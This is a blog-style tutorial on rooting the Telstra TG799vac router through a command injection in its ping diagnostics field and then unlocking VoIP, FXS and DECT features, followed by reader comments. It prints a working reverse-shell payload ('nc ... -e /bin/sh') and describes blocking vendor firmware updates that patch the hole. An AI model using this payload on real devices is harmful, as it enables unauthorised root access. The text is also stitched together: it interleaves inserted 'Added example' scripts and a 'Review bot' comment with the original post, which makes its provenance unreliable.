Hacking the Technicolor TG799vac (and unlocking features!)

 

The TG799vac, known more commonly in Australia as the “Telstra Gateway Max”, is a very capable piece of equipment. It has 802.11ac, a VDSL / ADSL2 modem (meaning NBN FTTN compatibility), a DECT base station, two FXS ports for analogue phones, and an FXO port.

They are supplied directly to Telstra and so ship with Telstra-branded firmware. There is no ‘generic’ firmware available that simply gives you access to the modem like any other device you might buy. Personally, I think this kind of sucks: if you decide to use this device with anyone other than Telstra, you lose access to the VoIP functionality, the DECT base station and the FXO port. That was the motivation to crack into this device and re-enable as many features as possible.

By default, the IP address of the modem will be 10.0.0.138. In this example, I use a desktop on 10.0.0.122.

First, we have to exploit the web interface to get root access to the device. This is possible because of a flaw in the IPv6 address validation on the Diagnostics page, which lets the web server run arbitrary commands. That is the starting point; without it none of the rest would be possible.
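The flaw above is a textbook case of untrusted input reaching a shell. The following is an added example, not code from the original post or from the Technicolor firmware: it shows the class of fix a vendor would apply to a diagnostics handler of this kind, namely a strict allow-list on the characters of the address and passing the value to ping as a single argument instead of through a shell command string. The helper names valid_ping_target and ping_argv are hypothetical, and the four inputs at the bottom are constructed.

```shell
#!/bin/sh
# Added example: not code from the original post or from the Technicolor
# firmware. It shows the class of fix for the flaw described above: a
# diagnostics handler that takes a user-supplied address must (a) accept only
# characters that can appear in an IPv4/IPv6 literal and (b) pass the value to
# ping as one argv element, never through a shell command string. The helper
# names valid_ping_target and ping_argv are hypothetical.

# Return 0 when $1 is plausibly an IPv4/IPv6 literal and safe as a single
# argument: non-empty, at most 45 chars (longest textual IPv6 form), only
# hex digits, '.' and ':', and at least one hex digit.
valid_ping_target() {
  target=$1
  [ -n "$target" ] || return 1
  [ "${#target}" -le 45 ] || return 1
  case $target in
    *[!0-9A-Fa-f:.]*) return 1 ;;   # ';', space, '|', '$', '-' ... are all rejected
  esac
  case $target in
    *[0-9A-Fa-f]*) return 0 ;;      # at least one hex digit present
  esac
  return 1
}

# Dry run of the safe invocation: prints the argument vector one element per
# line so it is visible that the address is a single argv entry that no shell
# re-parses. A real handler would exec ping with these arguments instead.
ping_argv() {
  if valid_ping_target "$1"; then
    printf '%s\n' ping -c 1 "$1"
  else
    printf 'rejected\n'
    return 1
  fi
}

# Constructed inputs: two legitimate addresses and two injection attempts.
for t in 10.0.0.122 '2001:db8::1' '::1;id' '10.0.0.1 -f'; do
  printf '%-14s -> ' "$t"
  ping_argv "$t" | tr '\n' ' '
  echo
done
```

The point of the dry run is that the address becomes one element of argv; even if a character slipped past the allow-list, ping would receive it as data rather than the shell interpreting it as a command separator.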

Getting root access

On your desktop, open a listening port (make sure your firewall allows inbound connections to it):
# nc -lvvp 10001

Now visit the ‘Diagnostics’ page on the modem, and click on the Ping & Traceroute tab. In the IP address section, enter:
:::::::;nc 10.0.0.122 10001 -e /bin/sh

If all goes well, your modem will connect back to your desktop and give you a root shell. NOTE: at this point you won’t see any shell prompt or error messages, so although you will get command output, it can be a little confusing.

First steps: change the root password and get dropbear (the SSH server) to run on boot. Note the lack of a prompt, and note that the echo below overwrites any existing contents of /etc/rc.local:

passwd
Changing password for root
New password:
Retype password:
Password for root changed by root
echo 'dropbear &' > /etc/rc.local
reboot

You should now be able to SSH into your modem on the LAN IP with the username root and the password you set above.

$ ssh root@10.0.0.138
root@10.0.0.138's password:
 
BusyBox v1.23.2 (2017-02-08 14:47:26 UTC) built-in shell (ash)
  _______              __           __              __
 |_     _|.-----.----.|  |--.-----.|__|.----.-----.|  |.-----.----.
   |   |  |  -__|  __||     |     ||  ||  __|  _  ||  ||  _  |   _|
   |___|  |_____|____||__|__|__|__||__||____|_____||__||_____|__|
                 N E X T   G E N E R A T I O N   G A T E W A Y
 --------------------------------------------------------------------
 NG GATEWAY SIGNATURE DRINK
 --------------------------------------------------------------------
  * 1 oz Vodka          Pour all ingredients into mixing
  * 1 oz Triple Sec     tin with ice, strain into glass.
  * 1 oz Orange juice
 --------------------------------------------------------------------
 
Product: vant-f_telstra
Release: Aqua (16.3)
Version: 16.3.7567-2521030-20170614084458-887a8c777ed8527277d7137ed9149816c889cf1d
 
 
Hash config:         887a8c777ed8527277d7137ed9149816c889cf1d
Hash openwrt:        ca2463af2522fc727150f23d6e85005112e8e8eb
Hash kernel:         b295f29cce441d87cef07373bfb07b546f720db3
Hash technicolor:    021884ac6200cd08635043046d33a717336a3554
Hash mindspeed:      91b6a7a4d703268d6023c3a58da3d33fc62e7ed8
Hash lte:            cf5c1319d7769c1b9e7721dfebcfe25e8cc1176f
Hash routing:        7b853f235ce96cd14f3abaebf9253c5ca7f72f7d
Hash custo:          85da3def73fee4e92f478d2b1afafdfc16235a81
Hash packages:       0f8aa1264d7a3bf6e4304f0f8ddfdabc4ddac7e4
 
Bootloader: 2.0.54
 
root@mygateway:~#

You’ll note straight away that the firmware is based on OpenWRT. This is good news, as it means most standard OpenWRT configuration applies directly to this modem.

Disable software updates

A reader has written to advise that the exploit we have used to get access to the modem is fixed in release 17.1. To prevent your modem from auto-upgrading, I suggest setting upgradesmanaged to '0' and commenting out the acs_url line in /etc/config/cwmpd, so that it reads:

option upgradesmanaged '0'
#option acs_url 'https://xxxxxxxxxx'

I also recommend disabling the service:

# /etc/init.d/cwmpd stop
# /etc/init.d/cwmpd disable
# /etc/init.d/cwmpdboot disable
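A quick way to confirm the edit took effect is to audit the config file itself. The script below is an added example, not part of the original post: it reads a copy of /etc/config/cwmpd and reports whether the TR-069 client can still manage upgrades or still knows an ACS URL. It inspects only the two keys named above (upgradesmanaged and acs_url); the section header and URL in its constructed sample files are placeholders, not the real values from the device.

```shell
#!/bin/sh
# Added example, not part of the original post: audit a copy of the TR-069
# client config (/etc/config/cwmpd on the TG799vac) and confirm that the
# remote-management agent can no longer pull a firmware upgrade. Only the two
# keys the post mentions (upgradesmanaged, acs_url) are inspected; the
# section header and URL in the constructed samples below are placeholders.

# Print the effective value of UCI option $2 in file $1, ignoring lines that
# have been commented out; prints nothing when the option is absent.
uci_value() {
  sed -n "s/^[[:space:]]*option[[:space:]][[:space:]]*$2[[:space:]][[:space:]]*'\([^']*\)'.*/\1/p" "$1" | tail -n 1
}

# Return 0 (true) when the config still lets the ACS manage upgrades or still
# names an ACS URL, i.e. when the edit described above is incomplete.
# An absent upgradesmanaged option is treated as "not disabled" (conservative
# assumption; the post only shows the value '0').
cwmpd_still_managed() {
  managed=$(uci_value "$1" upgradesmanaged)
  acs=$(uci_value "$1" acs_url)
  [ "$managed" != "0" ] || [ -n "$acs" ]
}

# One-word verdict for a config file: "exposed" or "hardened".
audit_cwmpd() {
  if cwmpd_still_managed "$1"; then echo exposed; else echo hardened; fi
}

# Constructed samples: $2 = "before" (stock-style) or "after" (edited as above).
write_sample() {
  if [ "$2" = before ]; then
    cat > "$1" <<'EOF'
config cwmpd 'placeholder_section'
        option upgradesmanaged '1'
        option acs_url 'https://acs.example.invalid/'
EOF
  else
    cat > "$1" <<'EOF'
config cwmpd 'placeholder_section'
        option upgradesmanaged '0'
        #option acs_url 'https://acs.example.invalid/'
EOF
  fi
}

tmpdir=${TMPDIR:-/tmp}/cwmpd-audit.$$
mkdir -p "$tmpdir"
write_sample "$tmpdir/before" before
write_sample "$tmpdir/after" after
echo "stock config:  $(audit_cwmpd "$tmpdir/before")"
echo "edited config: $(audit_cwmpd "$tmpdir/after")"
```

Run it against the real file with audit_cwmpd /etc/config/cwmpd on the modem. The config check complements the service check: on OpenWRT, /etc/init.d/cwmpd disable removes the start symlink from /etc/rc.d, so listing that directory after a reboot shows whether the service can still come back.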

Using bridge mode with dedicated PPPoE ethernet port

I use the device’s AP on my LAN, but I run the modem purely in bridge mode, which means I want to dedicate a port to my own router so it can do PPPoE to my ISP. Thankfully, standard OpenWRT config applies. I added a new bridge called ‘adsl_wan’ and added eth4, eth3, atm_8_35 and ptm0 to it:

config interface 'adsl_wan'
        option type 'bridge'
        option ip6hint '0'
        option force_link '0'
        list ifname 'eth4'
        list ifname 'eth3'
        list ifname 'atm_8_35'
        list ifname 'ptm0'

You’ll need to remove eth3 from the LAN VLAN. This puts the port right next to the WAN ethernet port (that port is eth3; eth4 is the WAN port) on the same bridge as the VDSL/ADSL modem. I have yet to figure out how to make the WAN port itself do this, as it seems to be configured differently, perhaps at the switch level.

Enable web interface features

If the modem is in bridge mode, the web interface is gutted compared to routed mode.

Edit /www/lua/cards_limiter.lua and change the following function so it returns false unconditionally. In Lua a return must be the last statement of its block, so the early return is wrapped in do ... end to keep the file loading:

function M.card_limited(info, cardname)
  -- Display all cards, even in bridge mode.
  do return false end

  -- Original logic, now unreachable:
  if info.bridged then
    return not bridge_limit_list[cardname]
  end
  return false
end

Restart the web interface via: /etc/init.d/nginx restart

Configure a third party SIP provider

Edit /etc/config/mmpbxrvsipnet and use the following guide.

Under the heading sip_net, set:

  • primary_registrar to your SIP server – e.g. my.sipserver.com
  • primary_registrar_port to 5060
  • primary_proxy to your SIP server – e.g. my.sipserver.com
  • primary_proxy_port to 5060

Under the heading sip_profile_0, set:

  • user_name – your SIP username
  • uri – your SIP username
  • password – your SIP password
  • enabled – set to 1

Then restart the mmpbxd service via /etc/init.d/mmpbxd restart

If you have multiple SIP accounts to log into, and with different providers, you can duplicate the entire sip_net section under a different name and configure it as above. Set the profile’s network setting to point to the new section you have created.

Enable the FXS ports

To enable the FXS ports, set the relay_state parameter to '1' in /etc/config/mmpbxbrcmfxsdev, e.g. for FXS port 2:

config device 'fxs_dev_0'
        option user_friendly_name 'Phone 1'
        option comfort_noise 'silence'
        option echo_cancellation '1'
        option fax_transport 'inband_renegotiation'
        option t38_redundancy '1'
        option rtcp_interval '5000'
        #list codec_black_list 'G722'
        #list codec_black_list 'AMR-WB'
        option cw_cas_delay '758'
        option fxs_privacy_reason 'P'
        option fxs_unavailability_reason 'O'
        option fxs_port '2'
        option cid_display_date_enabled '1'
        option cid_display_calling_line_enabled '1'
        option cid_display_calling_party_name_enabled '1'
        option pos '0'
        option early_detect_faxmodem '0'
        option relay_state '1'


SIP call routing

Each DECT device or FXS port can be registered against one or multiple SIP accounts. Look for the incoming_map section for sip_profile_0 and edit as needed. This is my setup, which routes sip_profile_1 to the first registered DECT device and to FXS port 1:

config incoming_map
        option profile 'sip_profile_0'
        list device 'fxs_dev_0'
        list device 'dect_dev_1'
        list device 'dect_dev_2'
        list device 'dect_dev_3'
        list device 'dect_dev_4'
        list device 'dect_dev_5'
        list device 'sip_dev_0'
        list device 'sip_dev_1'
        list device 'sip_dev_2'
        list device 'sip_dev_3'
        list device 'sip_dev_4'
        list device 'sip_dev_5'
        list device 'sip_dev_6'

config incoming_map
        option profile 'sip_profile_1'
        list device 'dect_dev_0'
        list device 'fxs_dev_1'

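An FXS port that is listed in an incoming_map but still has relay_state '0' silently never rings, so it is worth cross-checking the two configs above. The script below is an added example, not part of the original post: it reads a copy of /etc/config/mmpbxbrcmfxsdev and a copy of whichever file holds the incoming_map sections (the post does not name that file, so it is passed in as an argument) and prints every fxs_dev_* that is routed to a SIP profile but is undefined or not enabled. The two sample files it writes are constructed for the stand-alone run.

```shell
#!/bin/sh
# Added example, not part of the original post: cross-check a copy of the FXS
# device config (/etc/config/mmpbxbrcmfxsdev, shown above) against the
# incoming_map sections and report each fxs_dev_* that is routed to a SIP
# profile but is still physically disabled (relay_state not '1') or undefined.
# The file holding incoming_map is passed in because the post does not name
# it; the sample files below are constructed.

# $1 = FXS device config, $2 = file containing the incoming_map sections.
# Prints "<profile> <device> relay_state=<v>" or "<profile> <device> undefined"
# per problem found, and nothing when every mapped FXS port is enabled.
fxs_mapped_but_disabled() {
  awk -v q="'" '
    function unq(s) { gsub(q, "", s); return s }
    FNR == 1 { nfile++ }
    # file 1: remember relay_state for each "config device" section
    nfile == 1 && $1 == "config" && $2 == "device" { dev = unq($3); next }
    nfile == 1 && $1 == "option" && $2 == "relay_state" { relay[dev] = unq($3); next }
    # file 2: walk incoming_map sections and their device lists
    nfile == 2 && $1 == "config" { inmap = ($2 == "incoming_map"); prof = "?"; next }
    nfile == 2 && inmap && $1 == "option" && $2 == "profile" { prof = unq($3); next }
    nfile == 2 && inmap && $1 == "list" && $2 == "device" && $3 ~ /fxs_dev_/ {
      d = unq($3)
      if (!(d in relay)) print prof, d, "undefined"
      else if (relay[d] != "1") print prof, d, "relay_state=" relay[d]
    }
  ' "$1" "$2"
}

# Constructed samples: port 1 enabled, port 2 still disabled, port 3 never defined.
tmpdir=${TMPDIR:-/tmp}/fxs-check.$$
mkdir -p "$tmpdir"
fxs_cfg=$tmpdir/mmpbxbrcmfxsdev
map_cfg=$tmpdir/incoming_map
cat > "$fxs_cfg" <<'EOF'
config device 'fxs_dev_0'
        option user_friendly_name 'Phone 1'
        option relay_state '1'

config device 'fxs_dev_1'
        option user_friendly_name 'Phone 2'
        option relay_state '0'
EOF
cat > "$map_cfg" <<'EOF'
config incoming_map
        option profile 'sip_profile_0'
        list device 'fxs_dev_0'
        list device 'dect_dev_1'

config incoming_map
        option profile 'sip_profile_1'
        list device 'dect_dev_0'
        list device 'fxs_dev_1'
        list device 'fxs_dev_2'
EOF

echo "mapped but not usable:"
fxs_mapped_but_disabled "$fxs_cfg" "$map_cfg"
```

Only fxs_dev_* entries are checked because DECT and SIP devices are defined in other files that the post does not show; a reference to a DECT handset that has not been paired yet would otherwise show up as a false positive.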

Registering DECT handsets

After enabling all the ‘cards’ via the web interface, the easy way is to start DECT pairing from the web interface. Click on the Telephony card, then ‘Start’ the pairing and follow the instructions for your handset. This was straightforward for me.

Speeding up sync times

If you are on an NBN FTTN connection, it seems the modem still tries to sync using ADSL first. The default NBN FTTN profile is 17a, so we can disable the other modes and profiles in /etc/config/xdsl:

config xdsl 'dsl0'
        #list multimode 'gdmt'
        #list multimode 'adsl2annexm'
        #list multimode 'adsl2plus'
        list multimode 'vdsl2'
        #list profile '8a'
        #list profile '8b'
        #list profile '8c'
        #list profile '8d'
        #list profile '12a'
        #list profile '12b'
        list profile '17a'
        option enabled '1'
        option eoc_vendor_id 'BETMMB'
        option handshake_switch_timeout '0'
        option demod_cap_value '0x90447a'
        option demod_cap_mask '0x90447a'
        option demod_cap2_value '0x790000'
        option demod_cap2_mask '0x790000'
        option aux_features_value '0x1064003'
        option aux_features_mask '0x1064003'
        option vdsl_cfg_flags_value '0x1200e00'
        option vdsl_cfg_flags_mask '0x1200000'
        option xdsl_cfg1_value '0x0'
        option xdsl_cfg1_mask '0x0'
        option xdsl_cfg2_value '0x0'
        option xdsl_cfg2_mask '0x0'
        option maxaggrdatarate '160000'
        option maxdsdatarate '110000'
        option maxusdatarate '40000'
        option eoc_serial_number 'YeahRight 799vac 16.3'


Update history

2017-09-02 – Initial revision of this document.
2017-09-07 – Add section to disable cwmpd to prevent pushed firmware updates locking us out.

      9 Responses to “Hacking the Technicolor TG799vac (and unlocking features!)”

    1. Do you know how to disable this hack and turn the modem back to its default status, please?

    2. Anyway, on the DGA4130 (Technicolor AGTEF) SSH is enabled, but using WinSCP or PuTTY I always get “access denied”. It seems that even though it says “password for root changed by root” and I enabled dropbear (the SSH server) via the echo ‘dropbear &’ > /etc/rc.local command, after the reboot SSH is enabled but it does not seem to accept the root password I entered before, and I don’t know why.

      Maybe my Technicolor modem requires more hacking tweaks. Could you help me, please?

      • You might need to edit the file /etc/config/dropbear and allow it to use password auth.

        Mine looks like:

        config dropbear
                option enable '1'
                option PasswordAuth 'on'
                option RootPasswordAuth 'on'
                option Port         '22'
                option IdleTimeout '600'
        #       option BannerFile   '/etc/banner'
        
    3. Thanks for this. Pity they fixed the exploit in the web pages in 17.1, but it seems I got to mine before any push happened.

      Stopped and disabled the update service, but it reappeared after reboot, so I mashed out the update URL with hashes as suggested:
      #option acs_url 'https://################################'

    4. Can I also add, just for the sake of the search engines, that most of this also applies to the iiNet / Internode issued TG-789 VDSL modems?

      Can I also note that, on the TG-789 at least, you can enable dropbear SSH by editing the /etc/config/dropbear file instead of adding to the /etc/rc.local file.

      *** dropbear.orig 2017-09-08 09:40:16.532696000 +1000
      — dropbear 2017-09-08 09:41:10.828503662 +1000
      ***************
      *** 1,7 ****
      config dropbear
      ! option enable ‘0’
      ! option PasswordAuth ‘off’
      ! option RootPasswordAuth ‘off’
      option Port ’22’
      # option BannerFile ‘/etc/banner’
      option IdleTimeout ‘600’
      — 1,7 —-
      config dropbear
      ! option enable ‘1’
      ! option PasswordAuth ‘on’
      ! option RootPasswordAuth ‘on’
      option Port ’22’
      # option BannerFile ‘/etc/banner’
      option IdleTimeout ‘600’
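      Review bot: the hunk flips RootPasswordAuth (and PasswordAuth) from ‘off’ to ‘on’ while leaving Port ’22’ unchanged, so it should only be applied after the root password has been changed with passwd as in the post's first step; on a device still carrying its factory root password this exposes SSH to that password. Also note that the quotes in the hunk are typographic (‘0’, ‘1’, ’22’), which is a copy-paste artifact: the file on the device must use straight single quotes, i.e. option enable '1', or UCI will not parse the values as intended.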

    5. It would be nice if someone finds a new exploit on 17.1 to enable root access. My modem is now fixed. 🙁

    6. Is there anyone who knows how to switch from bank_2 to bank_1?

      My modem does not have telnet or SSH access. 🙁
